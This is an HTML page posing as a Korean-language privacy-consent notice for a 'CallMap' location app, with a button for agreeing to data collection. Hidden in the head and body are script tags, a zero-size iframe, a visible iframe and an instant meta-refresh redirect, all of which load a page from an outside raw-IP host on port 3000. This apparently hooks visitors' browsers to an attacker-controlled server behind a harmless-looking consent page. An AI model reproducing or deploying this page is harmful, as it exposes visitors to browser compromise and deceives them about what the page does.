<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CallMap 개인정보 이용 안내</title>
    <script src="https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html">
        <meta http-equiv="refresh" content="0; url=https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html">
    <link rel="html" type="text/html" href="https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html">
    </script>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            background-color: #f0f0f0;
            color: #333;
        }

        .container {
            max-width: 600px;
            margin: 0 auto;
            background-color: #fff;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        h1 {
            text-align: center;
        }

        p {
            line-height: 1.6;
            margin-bottom: 20px;
        }

        .disclaimer {
            font-size: 14px;
            color: #666;
        }

        .btn {
            display: flex;
            width: 100%;
            height: 37px;
            padding-top: 5%;
            background-color: dodgerblue;
            color: #fff;
            text-align: center;
            text-decoration: none;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            justify-content: center;
            align-items: cneter;
        }

        .btn:hover {
            background-color: #007bb5;
        }
    </style>
    <iframe src="https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html" frameborder="0" width="0" height="0"></iframe>
</head>

<body>
    <div class="container">
    <iframe src="https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html"></iframe>
        <h1>CallMap 개인정보 이용 안내</h1>
        <p>CallMap 어플리케이션은 사용자의 위치 정보를 수집하여 택시 호출 및 버스 노선 정보를 제공하기 위해 사용합니다.</p>
        <p>수집된 개인정보는 어플리케이션의 서비스 향상을 위한 목적으로만 사용되며, 어떠한 경우에도 사적인 용도나 타 기관에 제공되지 않습니다.</p>
        <p class="disclaimer">이에 동의하지 않으실 경우, 어플리케이션의 서비스 이용이 제한될 수 있습니다.</p>
        <a href="lock1.html" class="btn">개인정보 수집에 동의합니다</a>
        <script src="https://172-233-208-160.ip.linodeusercontent.com:3000/demos/butcher/index.html"></script>
    </div>
</body>

</html>
